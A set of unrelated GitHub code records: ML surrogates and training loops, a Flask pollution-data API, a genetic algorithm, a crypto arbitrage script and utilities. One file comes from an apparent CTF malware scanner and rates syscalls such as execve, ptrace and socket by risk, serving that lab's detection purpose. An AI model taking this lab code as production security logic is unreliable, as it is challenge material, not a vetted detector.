warnings.warn(\"xgboost not installed, BoFire's `XGBoostSurrogate` cannot be used.\")\n\nimport uuid\n\nfrom bofire.data_models.surrogates.api import XGBoostSurrogate as DataModel\nfrom bofire.surrogates.surrogate import Surrogate\nfrom bofire.surrogates.trainable import TrainableSurrogate\n\n\nclass XGBoostSurrogate(TrainableSurrogate, Surrogate):\n def __init__(self, data_model: DataModel, **kwargs) -> None:\n self.n_estimators = data_model.n_estimators\n self.max_depth = data_model.max_depth\n self.max_leaves = data_model.max_leaves\n self.max_bin = data_model.max_bin\n self.grow_policy = data_model.grow_policy\n self.learning_rate = data_model.learning_rate\n self.objective = data_model.objective\n self.booster = data_model.booster\n self.n_jobs = data_model.n_jobs\n self.gamma = data_model.gamma\n self.min_child_weight = data_model.min_child_weight\n self.max_delta_step = data_model.max_delta_step\n self.subsample = data_model.subsample\n self.sampling_method = data_model.sampling_method\n self.colsample_bytree = data_model.colsample_bytree\n self.colsample_bylevel = data_model.colsample_bylevel\n self.colsample_bynode = data_model.colsample_bynode\n self.reg_alpha = data_model.reg_alpha\n self.reg_lambda = data_model.reg_lambda\n self.scale_pos_weight = data_model.scale_pos_weight\n self.random_state = data_model.random_state\n self.num_parallel_tree = data_model.num_parallel_tree\n self.tmpfile_name = f\"xgb_{uuid.uuid4().hex}.json\"\n super().__init__(data_model=data_model, **kwargs)\n\n def _init_xgb(self):\n self.model = XGBRegressor(\n n_estimators=self.n_estimators,\n max_depth=self.max_depth,\n max_leaves=self.max_leaves,\n max_bin=self.max_bin,\n grow_policy=self.grow_policy,\n learning_rate=self.learning_rate,\n objective=self.objective,\n booster=self.booster,\n n_jobs=self.n_jobs,\n gamma=self.gamma,\n min_child_weight=self.min_child_weight,\n max_delta_step=self.max_delta_step,\n subsample=self.subsample,\n sampling_method=self.sampling_method,\n colsample_bytree=self.colsample_bytree,\n colsample_bylevel=self.colsample_bylevel,\n colsample_bynode=self.colsample_bynode,\n reg_alpha=self.reg_alpha,\n reg_lambda=self.reg_lambda,\n scale_pos_weight=self.scale_pos_weight,\n random_state=self.random_state,\n num_parallel_tree=self.num_parallel_tree,\n )\n\n def _fit(self, X: pd.DataFrame, Y: pd.DataFrame, **kwargs):\n transformed_X = self.inputs.transform(X, self.input_preprocessing_specs)\n self._init_xgb()\n self.model.fit(X=transformed_X.values, y=Y.values)\n\n def _predict(self, transformed_X: pd.DataFrame) -> Tuple[np.ndarray, np.ndarray]:\n preds = self.model.predict(transformed_X.values)\n return preds.reshape((transformed_X.shape[0], 1)), np.zeros(\n (transformed_X.shape[0], 1)\n )\n\n def loads(self, data: str):\n with make_tmpfile(name=self.tmpfile_name) as fname:\n # write to file\n self._init_xgb()\n with open(fname, \"w\") as f:\n f.write(data)\n self.model.load_model(fname)\n\n def _dumps(self) -> str:\n with make_tmpfile(name=self.tmpfile_name) as fname:\n self.model.save_model(fname=fname)\n with open(fname, \"r\") as f:\n dump = f.read()\n return dump\n","repo_name":"experimental-design/bofire","sub_path":"bofire/surrogates/xgb.py","file_name":"xgb.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"37"} +{"seq_id":"13499114842","text":"import time\r\nfrom typing import List\r\n\r\nimport torch\r\nfrom torch import nn\r\n\r\nfrom axformer.label_smoothing import LabelSmoothing\r\nfrom axformer.model.axformer import Axformer\r\nfrom axformer.noam_opt import NoamOpt\r\nfrom axformer.simple_loss_compute import SimpleLossCompute\r\nfrom axformer.data_utils import toy_data_gen, MyIterator, rebatch\r\nfrom axformer.multi_gpu_loss_compute import MultiGPULossCompute\r\n\r\ndef run_epoch(data_iter, model, loss_compute):\r\n \"Standard Training and Logging Function\"\r\n start = time.time()\r\n total_tokens = 0\r\n total_loss = 0\r\n tokens = 0\r\n for i, batch in enumerate(data_iter):\r\n out = model.forward(batch.src, batch.trg,\r\n batch.src_mask, batch.trg_mask)\r\n loss = loss_compute(out, batch.trg_y, batch.ntokens)\r\n total_loss += loss\r\n total_tokens += batch.ntokens\r\n tokens += batch.ntokens\r\n if i % 50 == 1:\r\n elapsed = time.time() - start\r\n print(\"Epoch Step: %d Loss: %f Tokens per Sec: %f\" %\r\n (i, loss / batch.ntokens, tokens / elapsed))\r\n start = time.time()\r\n tokens = 0\r\n return total_loss / total_tokens\r\n\r\ndef batch_size_fn(new, count, sofar, max_src_in_batch, max_tgt_in_batch):\r\n \"Keep augmenting batch and calculate total number of tokens + padding.\"\r\n if count == 1:\r\n max_src_in_batch = 0\r\n max_tgt_in_batch = 0\r\n max_src_in_batch = max(max_src_in_batch, len(new.src))\r\n max_tgt_in_batch = max(max_tgt_in_batch, len(new.trg) + 2)\r\n src_elements = count * max_src_in_batch\r\n tgt_elements = count * max_tgt_in_batch\r\n return max(src_elements, tgt_elements), max_src_in_batch, max_tgt_in_batch\r\n\r\n\r\n# Train the simple copy task.\r\ndef toy_train():\r\n vocab_size, d_model, n_layers = 11, 512, 2\r\n model = Axformer(vocab_size, vocab_size, n_layers=n_layers, d_model=d_model)\r\n\r\n criterion = LabelSmoothing(size=vocab_size, padding_idx=0, smoothing=0.0)\r\n\r\n model_opt = NoamOpt(d_model, 1, 400,\r\n torch.optim.Adam(model.parameters(), lr=0, betas=(0.9, 0.98), eps=1e-9))\r\n\r\n for epoch in range(10):\r\n model.train()\r\n run_epoch(toy_data_gen(vocab_size, batch_size=30, nbatches=20), model,\r\n SimpleLossCompute(model.generator, criterion, model_opt))\r\n model.eval()\r\n print(run_epoch(toy_data_gen(vocab_size, batch_size=30, nbatches=5), model,\r\n SimpleLossCompute(model.generator, criterion, None)))\r\n\r\ndef create_iterators(devices:List[int], SRC, TGT, train, val):\r\n pad_idx = TGT.vocab.stoi[\"\"]\r\n model = Axformer(len(SRC.vocab), len(TGT.vocab), n_layers=6)\r\n model.cuda()\r\n criterion = LabelSmoothing(size=len(TGT.vocab), padding_idx=pad_idx, smoothing=0.1)\r\n criterion.cuda()\r\n BATCH_SIZE = 12000\r\n train_iter = MyIterator(train, batch_size=BATCH_SIZE, device=0,\r\n repeat=False, sort_key=lambda x: (len(x.src), len(x.trg)),\r\n batch_size_fn=batch_size_fn, train=True)\r\n valid_iter = MyIterator(val, batch_size=BATCH_SIZE, device=0,\r\n repeat=False, sort_key=lambda x: (len(x.src), len(x.trg)),\r\n batch_size_fn=batch_size_fn, train=False)\r\n model_par = nn.DataParallel(model, device_ids=devices)\r\n\r\n return train_iter, valid_iter, model_par\r\n\r\ndef train(devices, criterion, pad_idx, model, train_iter, valid_iter, model_par, epochs=10):\r\n model_opt = NoamOpt(model.src_embed[0].d_model, 1, 2000,\r\n torch.optim.Adam(model.parameters(), lr=0, betas=(0.9, 0.98), eps=1e-9))\r\n for epoch in range(epochs):\r\n model_par.train()\r\n run_epoch((rebatch(pad_idx, b) for b in train_iter),\r\n model_par,\r\n MultiGPULossCompute(model.generator, criterion,\r\n devices=devices, opt=model_opt))\r\n model_par.eval()\r\n loss = run_epoch((rebatch(pad_idx, b) for b in valid_iter),\r\n model_par,\r\n MultiGPULossCompute(model.generator, criterion,\r\n devices=devices, opt=None))\r\n print(loss)","repo_name":"sytelus/axformer","sub_path":"axformer/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36443297741","text":"from loguru import logger\n\nlogger.add(\"debug.log\", rotation=\"100 MB\", colorize=True, format=\"{time} {message}\")\n\n\nclass Mapper:\n def __init__(self, r1, s1, r2, s2):\n self.s1 = s1\n self.s2 = s2\n self.r1 = r1\n self.r2 = r2\n\n def formula(self, r1, s1, r2, s2, x):\n y= ((s2 - s1) * x + (-s2 * r1) + (s1 * r2)) / (r2 - r1)\n # logger.debug(f\"input: {x} output: {y} @ (r1,s1)=({r1},{s1});(r2,s2)=({r2},{s2})\")\n return y\n\n def transform(self, x):\n if 0 <= x < self.r1:\n return self.formula(0, 0, self.r1, self.s1, x)\n elif self.r1 <= x < self.r2:\n return self.formula(self.r1, self.s1, self.r2, self.s2, x)\n elif self.r2 <= x <= 255:\n return self.formula(self.r2, self.s2, 255, 255,x)\n else:\n raise Exception(\"x not in range\")\n","repo_name":"Bamdad-rar/Digital-Image-Processing","sub_path":"Exercise_02/Q02/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8061981999","text":"#Imports\n\nfrom asyncio import subprocess\nfrom tabnanny import check\nfrom flask import Flask, jsonify, render_template, request\nfrom flask_limiter import Limiter\nfrom flask_limiter.util import get_remote_address\nfrom flask_cors import CORS, cross_origin\n\n\nimport json\nimport subprocess\nimport os\nimport signal\n\nimport utils.utilsDB as utilsDB\n\n#Flask Settings\n\napp = Flask(__name__, template_folder=\"templates\")\ncors = CORS(app, resources={r\"/*\":{\"origins\": \"http://localhost:8085\"}})\napp.config['JSON_SORT_KEYS'] = False\nlimiter = Limiter(app,key_func=get_remote_address)\n\n#Flask routes\n\n@app.route(\"/\")\n@limiter.limit(\"30/second\")\ndef mainPage():\n return render_template('index.html')\n\n@app.route('/')\ndef fallback(page):\n return render_template('index.html')\n\n@app.route(\"/login\", methods=['POST'])\n@limiter.limit(\"30/second\")\ndef login():\n username = \"\"\n password = \"\"\n if(request.method == 'POST'):\n username = request.json['username']\n password = request.json['password']\n return jsonify(utilsDB.login(username, password))\n \n@app.route(\"/executeScript\")\n@limiter.limit(\"30/second\")\ndef executeScript(): \n process = subprocess.Popen(\"python3.9 ./requestsAQICN.py\", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)\n utilsDB.saveProcessPid(process.pid)\n while True:\n output = process.stdout.readline()\n if output == '' and process.poll() is not None:\n break\n if output:\n print(output.decode(\"utf-8\").strip())\n rc = process.poll()\n return jsonify(\"Complete\") \n \n@app.route(\"/killScript\")\n@limiter.limit(\"30/second\")\ndef killScript():\n pid = utilsDB.getProcessPid() \n os.killpg(os.getpgid(pid[0]), signal.SIGTERM)\n return jsonify(\"Complete\") \n \n@app.route(\"/getScriptCount\")\n@limiter.limit(\"30/second\")\ndef getScriptCount():\n return jsonify(utilsDB.getScriptCount())\n\n@app.route(\"/GeoJson/provinces\")\n@limiter.limit(\"30/second\")\ndef getGeoJSONProvinces():\n json_file = open(\"data/provinces.json\")\n json_object = json.load(json_file)\n json_file.close()\n return jsonify(json_object)\n\n@app.route(\"/GeoJson/autonomous_regions\")\n@limiter.limit(\"30/second\")\ndef getGeoJSONAutonomousRegions():\n json_file = open(\"data/autonomous_regions.json\")\n json_object = json.load(json_file)\n json_file.close()\n return jsonify(json_object)\n\n@app.route(\"/getAllData\")\n@limiter.limit(\"30/second\")\ndef getAllData():\n return jsonify(utilsDB.get_all_air_pollution_data())\n\n@app.route(\"/getData\", methods=['POST'])\n@limiter.limit(\"30/second\")\ndef getData():\n location_name = \"\"\n date = \"\"\n if(request.method == 'POST'):\n location_name = request.json['location_name']\n date = request.json['date']\n return jsonify(utilsDB.get_air_pollution_data(location_name, date))\n\n@app.route(\"/getStatisticalData\", methods=['POST'])\n@limiter.limit(\"30/second\")\ndef getStatisticalData():\n location_name = \"\"\n date = \"\"\n if(request.method == 'POST'):\n location_name = request.json['location_name']\n date = request.json['date']\n return jsonify(utilsDB.get_air_pollution_statistical_data(location_name, date))\n\n@app.route(\"/getForecastData\", methods=['POST'])\n@limiter.limit(\"30/second\")\ndef getForecastData():\n location_name = \"\"\n pollutant = \"\"\n date = \"\"\n if(request.method == 'POST'):\n location_name = request.json['location_name']\n pollutant = request.json['pollutant_name']\n date = request.json['date']\n return jsonify(utilsDB.get_air_pollution_forecast_data(location_name,pollutant, date))\n\n@app.route(\"/getNearestLocationDataDate\", methods=['POST'])\n@limiter.limit(\"30/second\")\ndef getNearestLocationDataDate():\n location_name = \"\"\n if(request.method == 'POST'):\n location_name = request.json['location_name']\n return jsonify(utilsDB.get_nearest_location_data_date(location_name))\n\n@app.route(\"/getRankings\", methods=['POST'])\n@limiter.limit(\"30/second\")\ndef getRankings():\n pollutant = \"\"\n if(request.method == 'POST'):\n pollutant = request.json['pollutant']\n date = request.json['date']\n return jsonify(utilsDB.get_rankings_data(pollutant, date))\n\n@app.route(\"/getUniqueLocations\")\n@limiter.limit(\"30/second\")\ndef getUniqueLocations():\n return jsonify(utilsDB.get_unique_locations())\n\n@app.route(\"/getUniqueLocationsInfoData\")\n@limiter.limit(\"30/second\")\ndef getUniqueLocationsInfoData():\n return jsonify(utilsDB.get_unique_location_info_data())\n\n@app.route(\"/getRankingDateRange\")\n@limiter.limit(\"30/second\")\ndef getDateRange():\n return jsonify(utilsDB.get_ranking_date_range())\n\n@app.route(\"/getForecastDateRange\", methods=['POST'])\n@limiter.limit(\"30/second\")\ndef getForecastDateRange():\n location = \"\"\n pollutant = \"\"\n if(request.method == 'POST'):\n location = request.json['location_name']\n pollutant = request.json['pollutant_name']\n return jsonify(utilsDB.get_forecast_date_range(location, pollutant))\n\n\n# Main\n# ---------------------------------------------------------------------\nthis_module: str = __name__\nmain_module: str = \"__main__\"\n\nif this_module == main_module:\n app.run(host=\"localhost\", port=8085, debug=True)","repo_name":"RogerPugaRuiz/DAWBIO-M12-PROJECT","sub_path":"backend-map/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40728126049","text":"import random\r\n\r\nlista_rizou = [0, 2, 4, 6, 14, 20, 28, 30, 32, 34, 42, 56, 70] #Λίστα με τα index των μαύρων boxes\r\n'''\r\n#_#_#_#\r\n_______\r\n#_____#\r\n_______\r\n#_#_#_#\r\n_______\r\n#______\r\n_______\r\n#______\r\n_______\r\n#______\r\n'''\r\nlista_Karabos = [0, 12, 14, 24, 28, 36, 42, 52, 56, 68, 70]\r\n'''\r\n#______\r\n_____#_\r\n#______\r\n___#___\r\n#______\r\n_#_____\r\n#______\r\n___#___\r\n#______\r\n_____#_\r\n#______\r\n'''\r\nx = input(str('Choose between Rizos and Karampoikis.\\n Type R to check Rizos or K to check Karampoikis: ')) #Επιλογή γράμματος παίρνει μονο τα Κ και Ρ, ανεξαρτήτως αν είναι κεφαλαία ή μικρά.\r\nwhile(x.upper() != 'R' and x.upper() != 'K'):\r\n print(x)\r\n x = input(str('Choose between Rizos and Karampoikis.\\n Type R to check Rizos or K to check Karampoikis:'))\r\nif x.upper() == 'R':\r\n END_GRID = lista_rizou\r\n percent = 10/14\r\nelse:\r\n END_GRID = lista_Karabos\r\n percent = 10/12\r\n\r\nSTARTING_POOL = 100\r\n\r\n\r\n#evaluation function\r\ndef eval_fun(rg, g): #Καλείται για να αποδόση βαθμολογία σε κάθε grid, επί της ουσίας συγκρίνει να δεί αν τα indexes βρίσκονται στις σωστές θέσει\r\n tmp_rg = rg.copy()\r\n result = 1\r\n for i in g:\r\n if i in tmp_rg:\r\n result += 1\r\n tmp_rg.remove(i)\r\n\r\n return result/(len(rg) +1 )\r\n\r\n#Explanatory function Καλείται όταν βρεθεί καλή λύση και εκτυπώνει πράγματα για το grid που βρήκε\r\ndef the_end(rg,g):\r\n tmp_rg = rg.copy()\r\n result = 1\r\n for i in g:\r\n if i in tmp_rg:\r\n result += 1\r\n tmp_rg.remove(i)\r\n print('Result is:',result,', at ', len(rg) +1)\r\n\r\n#Gnerate grid function Καλείται για να δημιουργήσει grid. Αυτό επιτυγχάνεται καλώντας 12 ή 14 ανάλογα με το END GRID εντελώς τυχαία νούμερα που θα είναι μεταξύ τους διαφορετικά\r\ndef generate_grid():\r\n grid = list()\r\n list_of_nums = list()\r\n for i in range(len(END_GRID)):\r\n num = random.randint(0,76)\r\n while(num in list_of_nums):\r\n num = random.randint(0,76)\r\n list_of_nums.append(num)\r\n grid.append(num)\r\n grid.sort()\r\n return grid\r\n\r\n#geneating random genetic pool Καλείται για να δημιουργήσει τον αρχικό μας πληθυσμό. Κάθε Pool έχει 100 (STARTING POOL) grid\r\n# και έναν αριθμό που αργότερα θα αναπαριστά το eval_func\r\ndef generate_pool(pool_size):\r\n pool = []\r\n for g in range(0, pool_size):\r\n grid = generate_grid()\r\n pool.append([grid, 0])\r\n return pool\r\n\r\n\r\n\r\n#generates the roulette for each stage Επίσης κάνει σόρτ και ύστερα στο pool αλλάζει το eval func με το ποσοστό των επιτυχώμενων καταστάσεων του grid ανά την βαθμολογία των συνολικών grids\r\ndef roulette_generator(rg ,pool):\r\n sum = 0\r\n for elem in pool:\r\n elem[1] = eval_fun(rg ,elem[0])\r\n if(elem[1]!=0):\r\n sum += elem[1]\r\n\r\n for elem in pool:\r\n if elem[1]!=0:\r\n elem[1] /= sum\r\n\r\n pool.sort(key = lambda elem: elem[1], reverse = True)\r\n total = 0\r\n tmp = 0\r\n for elem in pool:\r\n tmp = elem[1]\r\n elem[1] = elem[1] + total\r\n total += tmp\r\n\r\n\r\n#Choose Parents Function Επιλέγει γονείς και τους βγάζει από το pool\r\ndef chooseParents(rg, pool): \r\n pair = [0, 0]\r\n for i in range(0, 2):\r\n roulette_generator(rg, pool)\r\n #choose parent i\r\n point = random.uniform(0, 1)\r\n for elem in pool:\r\n if( point <= elem[1]):\r\n pair[i] = elem\r\n pool.remove(elem)\r\n break\r\n return pair\r\n\r\n\r\n#Mating Parents Function Κάνει Crossovers τους γονείς και δημιουργεί δύο παιδιά\r\ndef mateParents(pair):\r\n children = [pair[0], pair[1]]\r\n point = random.randint(1,11)\r\n for i in range(point, len(END_GRID)):\r\n children[0][0][i] = pair[1][0][i]\r\n children[1][0][i] = pair[0][0][i]\r\n children[0][0].sort()\r\n children[1][0].sort()\r\n return children\r\n\r\n#Nice Print Function Εκτυπώνει με ωραίο τρόπο την λίστα μας\r\ndef nice_print(grid):\r\n print('-'*50)\r\n s = ''\r\n for i in range(1, 78):\r\n if i-1 in grid[0]:\r\n s+='#'\r\n else: \r\n s+='_'\r\n if i%7 ==0:\r\n print(s)\r\n s = ''\r\n print(grid[0])\r\n\r\n\r\n#isDone Function Ελέγχει αν βρέθηκε αρκετά καλή λύση\r\ndef isDone(rg,g):\r\n e = eval_fun(END_GRID, pool[0][0])\r\n if( e >= percent ):\r\n print('Current best')\r\n nice_print(pool[0])\r\n the_end(END_GRID,pool[0][0])\r\n return True\r\n return False\r\n\r\n\r\n#STARTING PROGRAMM\r\nrandom.seed(a = None, version = 2) #Επιλέγω εντελώς τυχαίο seed\r\npool = generate_pool(STARTING_POOL) #Φτιάχνω τον αρχαίο πληθυσμό\r\ni = 0\r\nto_change = int(STARTING_POOL / 5) #Μεταβλητή όπου θα αλλάζει τα to_change χειρότερα grids με καινούριο τυχαία \r\nwhile(True):\r\n tmp = []\r\n roulette_generator(END_GRID, pool)\r\n if(isDone(END_GRID, pool[0][0])):\r\n break\r\n for j in range(0, int(STARTING_POOL/2)):\r\n pair = chooseParents(END_GRID, pool)\r\n children = mateParents(pair)\r\n tmp.append(children[0])\r\n tmp.append(children[1])\r\n pool = tmp.copy()\r\n roulette_generator(END_GRID, pool)\r\n if(isDone(END_GRID, pool[0][0])):\r\n break\r\n if(i % 10 == 0): #Κάθε 10 φορές θα χρησιμοποιεί την to change να αλλάξει τα to change χειρότερα δείγματα\r\n for j in range(0, to_change):\r\n g = generate_grid()\r\n pool[STARTING_POOL -j -1][0] = g.copy()\r\n if(isDone(END_GRID, pool[0][0])):\r\n break\r\n i += 1\r\n\r\n","repo_name":"SokianTerror/Genetic-Algortithm","sub_path":"wanga.py","file_name":"wanga.py","file_ext":"py","file_size_in_byte":6406,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2599538876","text":"import json \nimport requests\nfrom web3 import Web3, EthereumTesterProvider\nfrom dotenv import load_dotenv\nimport os\nfrom brownie import *\nfrom .abi import oneInchV4, zeroX\n\nload_dotenv()\n\noneInchv4 = oneInchV4()\nzerox = zeroX()\n\nw3 = Web3(Web3.HTTPProvider( os.getenv('RPC')))\n\nbaseAssetAddress = os.getenv('baseAssetAddress')\nquoteAssetAddress = os.getenv('quoteAssetAddress')\n\ndef main():\n try:\n base = baseAssetAddress[2:]\n quote = quoteAssetAddress[2:]\n res = requests.get(f'https://api.0x.org/sra/v3/orderbook?baseAssetData=0xf47261b0000000000000000000000000{base}"eAssetData=0xf47261b0000000000000000000000000{quote}&perPage=1000')\n _0x_txs = res.json()['bids']['records'] \n arb_results = map(checkArb, _0x_txs)\n arb_results = list(arb_results)\n #print(arb_results)\n except Exception as e:\n print(f\"error:{e}\")\n\ndef checkArb(r):\n zrxOrder, metadata = (r['order'], r['metaData'])\n inputAssetAmount = zrxOrder['takerAssetAmount']\n out2 = Web3.fromWei(int(zrxOrder['makerAssetAmount']), 'ether')\n amount = zrxOrder['makerAssetAmount']\n oneInchOrder = requests.get(f'https://api.1inch.exchange/v4.0/1/quote?fromTokenAddress={quoteAssetAddress}&toTokenAddress={baseAssetAddress}&amount={amount}').json()\n outputAssetAmount = oneInchOrder['toTokenAmount']\n netProfit = Web3.fromWei(int(outputAssetAmount), 'ether') - Web3.fromWei(int(inputAssetAmount), 'ether') \n if netProfit > 0.1:\n print(netProfit)\n print(out2)\n print(Web3.fromWei(int(outputAssetAmount), 'ether'))\n print(Web3.fromWei(int(inputAssetAmount), 'ether'))\n trade(zrxOrder, oneInchOrder)\n\ndef trade(zrxOrder, oneInchOrder):\n acc = accounts.at(os.getenv(\"myAccount\"), force=True)\n #swap_proxy = SwapProxy[len(SwapProxy) - 1]\n #print(swap_proxy)\n print(zrxOrder)\n print(\"================\")\n print(oneInchOrder)\n\n# ----------------------------------------------------- # \n# DONT FORGET FLASHBOTS ;) HAHAH // NO FRONT RUN PLEASE\n# ----------------------------------------------------- #","repo_name":"WillSchiller/brownie-arb-bot","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74663845227","text":"import numbers\nimport enum\nfrom typing import List, Tuple\n\n\nclass SyscallClass(enum.Enum):\n Ignore = 0\n Low = 1\n Medium = 2\n High = 3\n\n def __gt__(self, other):\n if isinstance(other, numbers.Real):\n return self.value > other\n return self.value > other.value\n\n def __lt__(self, other):\n if isinstance(other, numbers.Real):\n return self.value < other\n return self.value < other.value\n\n\n# Class, name, syscall number, arg count\nsyscalls = [\n [SyscallClass.Low, \"read\", 0, 3],\n [SyscallClass.Low, \"write\", 1, 3],\n [SyscallClass.Medium, \"open\", 2, 3],\n [SyscallClass.Low, \"close\", 3, 1],\n [SyscallClass.Medium, \"stat\", 4, 2],\n [SyscallClass.Medium, \"fstat\", 5, 2],\n [SyscallClass.Medium, \"lstat\", 6, 2],\n [SyscallClass.Medium, \"access\", 21, 2],\n [SyscallClass.Low, \"alarm\", 37, 1],\n [SyscallClass.High, \"socket\", 41, 3],\n [SyscallClass.High, \"connect\", 42, 3],\n [SyscallClass.High, \"accept\", 43, 3],\n [SyscallClass.High, \"shutdown\", 48, 2],\n [SyscallClass.High, \"bind\", 49, 3],\n [SyscallClass.High, \"listen\", 50, 2],\n [SyscallClass.Medium, \"clone\", 56, 5],\n [SyscallClass.Medium, \"fork\", 57, 0],\n [SyscallClass.Medium, \"vfork\", 58, 0],\n [SyscallClass.High, \"execve\", 59, 3],\n [SyscallClass.High, \"kill\", 62, 2],\n [SyscallClass.Medium, \"uname\", 63, 1],\n [SyscallClass.Medium, \"getdents\", 78, 3],\n [SyscallClass.Medium, \"getcwd\", 79, 2],\n [SyscallClass.Medium, \"chdir\", 80, 1],\n [SyscallClass.Medium, \"fchdir\", 81, 1],\n [SyscallClass.High, \"rename\", 82, 2],\n [SyscallClass.Low, \"mkdir\", 83, 2],\n [SyscallClass.High, \"rmdir\", 84, 1],\n [SyscallClass.High, \"unlink\", 87, 1],\n [SyscallClass.Medium, \"chmod\", 90, 2],\n [SyscallClass.Medium, \"fchmod\", 91, 2],\n [SyscallClass.High, \"chown\", 92, 3],\n [SyscallClass.High, \"fchown\", 93, 3],\n [SyscallClass.High, \"ptrace\", 101, 4],\n]\n\ntemplate = \"\"\"
\n

{}({}) = {}\n

\n\"\"\"\n\n\nclass LoggedSyscall:\n sys_num: int\n rdi: int\n rsi: int\n rdx: int\n r10: int\n r8: int\n r9: int\n ret: int\n\n def __init__(self, values):\n self.sys_num, self.rdi, self.rsi, self.rdx, \\\n self.r10, self.r8, self.r9, self.ret = values\n\n def get_args(self, count) -> List[int]:\n if count == 0:\n return []\n if count == 1:\n return [self.rdi]\n if count == 2:\n return [self.rdi, self.rsi]\n if count == 3:\n return [self.rdi, self.rsi, self.rdx]\n if count == 4:\n return [self.rdi, self.rsi, self.rdx, self.r10]\n if count == 5:\n return [self.rdi, self.rsi, self.rdx, self.r10, self.r8]\n if count == 6:\n return [self.rdi, self.rsi, self.rdx, self.r10, self.r8, self.r9]\n\n def render(self) -> Tuple[SyscallClass, str]:\n status = \"light\"\n for sys_entry in syscalls:\n if sys_entry[2] == self.sys_num:\n if sys_entry[0] == SyscallClass.Low:\n status = \"success\"\n elif sys_entry[0] == SyscallClass.Medium:\n status = \"warning\"\n elif sys_entry[0] == SyscallClass.High:\n status = \"danger\"\n rendered = template.format(status, f\"{sys_entry[1]}\", \", \".join([\n hex(x) for x in self.get_args(sys_entry[3])\n ]), hex(self.ret))\n return sys_entry[0], rendered\n rendered = template.format(status, f\"sys_{self.sys_num}\", \"\", hex(self.ret))\n return SyscallClass.Ignore, rendered\n","repo_name":"dkb4rb/HackTheBox_pwned","sub_path":"CTFS/scanned/content/malscanner/viewer/syscalls.py","file_name":"syscalls.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8397344391","text":"from ...error import GraphQLError\nfrom ...type.definition import get_named_type, is_leaf_type\nfrom .base import ValidationRule\n\n\nclass ScalarLeafs(ValidationRule):\n\n def enter_Field(self, node, key, parent, path, ancestors):\n type = self.context.get_type()\n\n if not type:\n return\n\n if is_leaf_type(get_named_type(type)):\n if node.selection_set:\n self.context.report_error(GraphQLError(\n self.no_subselection_allowed_message(node.name.value, type),\n [node.selection_set]\n ))\n\n elif not node.selection_set:\n self.context.report_error(GraphQLError(\n self.required_subselection_message(node.name.value, type),\n [node]\n ))\n\n @staticmethod\n def no_subselection_allowed_message(field, type):\n return 'Field \"{}\" of type \"{}\" must not have a sub selection.'.format(field, type)\n\n @staticmethod\n def required_subselection_message(field, type):\n return 'Field \"{}\" of type \"{}\" must have a sub selection.'.format(field, type)\n","repo_name":"wandb/wandb","sub_path":"wandb/vendor/graphql-core-1.1/wandb_graphql/validation/rules/scalar_leafs.py","file_name":"scalar_leafs.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"26643388335","text":"\"\"\" Text Form Display\n\n\"\"\"\nimport sys\n\n\nclass GraphLister(object):\n def __init__(self, iterable):\n self.lst = list(iterable)\n\n def grep(self, f):\n if isinstance(f, str):\n return GraphLister([x for x in self.lst if f in str(x)])\n else:\n return GraphLister([x for x in self.lst if f(x)])\n\n def map_(self, f, *args, **kwargs):\n for e in self.lst:\n f(e, *args, **kwargs)\n\n def print_graphs(self):\n global print_graph\n self.map_(print_graph)\n\n def __repr__(self):\n result = []\n for i,e in enumerate(self.lst):\n result.append(\"%4d %s\\n\"%(i,str(e)))\n return \"\".join(result)\n\nclass RichTranslation(object):\n def __init__(self, t):\n self.t = t\n\n def graphs(self, f = None):\n gs = GraphLister(self.t.context.graphs)\n if f != None:\n gs = gs.grep(f)\n return gs\n\ndef list_entries(lst):\n i = 0\n for e in lst:\n print(\"%4d %s\" % (i, e))\n i += 1\n\n\ndef print_block(b, map_bi=None, w_obj=sys.stdout):\n w_obj.write(\"blk_%d\\n\" % (map_bi[b] if map_bi else -1))\n w_obj.write(\"input: [%s]\\n\" % (\", \".join([str(arg) for arg in b.inputargs])))\n\n w_obj.write(\"operations:\\n\")\n for op in b.operations:\n w_obj.write(\" %s\\n\" % op)\n\n if b.exitswitch:\n w_obj.write(\"switch: %s\\n\" % b.exitswitch)\n\n w_obj.write(\"exits: [%s]\\n\" % (\", \".join(\n [str((\"blk_%d\" % (map_bi[lnk.target] if map_bi else -1), lnk.args)) for lnk in b.exits])))\n\n\ndef print_graph_with_name(graphs, name):\n for g in graphs:\n if str(g) == name:\n print_graph(g)\n\n\ndef build_block_index_map(g):\n idx = 0\n map_blk_idx = {}\n\n for b in g.iterblocks():\n map_blk_idx[b] = idx\n idx += 1\n return map_blk_idx\n\n\ndef print_graph(g, w_obj=sys.stdout):\n w_obj.write('================================================\\n')\n w_obj.write(str(g)+'\\n')\n\n map_bi = build_block_index_map(g)\n\n for b in g.iterblocks():\n w_obj.write('------------------------\\n')\n print_block(b, map_bi, w_obj)\n w_obj.write('================================================\\n')\n w_obj.write('\\n')\n","repo_name":"wdv4758h/mu-client-pypy","sub_path":"rpython/mutyper/tools/textgraph.py","file_name":"textgraph.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5170624672","text":"import cv2\nimport math\nimport numpy as np\n\nfile_src = 'src_depth_ball.png'\nfile_dst = 'dst.png'\n\nimg_src = cv2.imread(file_src, 0)\n\ncv2.namedWindow('src')\ncv2.namedWindow('dst')\n\ndepth_min = 206\ndepth_max = 210\nimg_dst = cv2.inRange(img_src, depth_min, 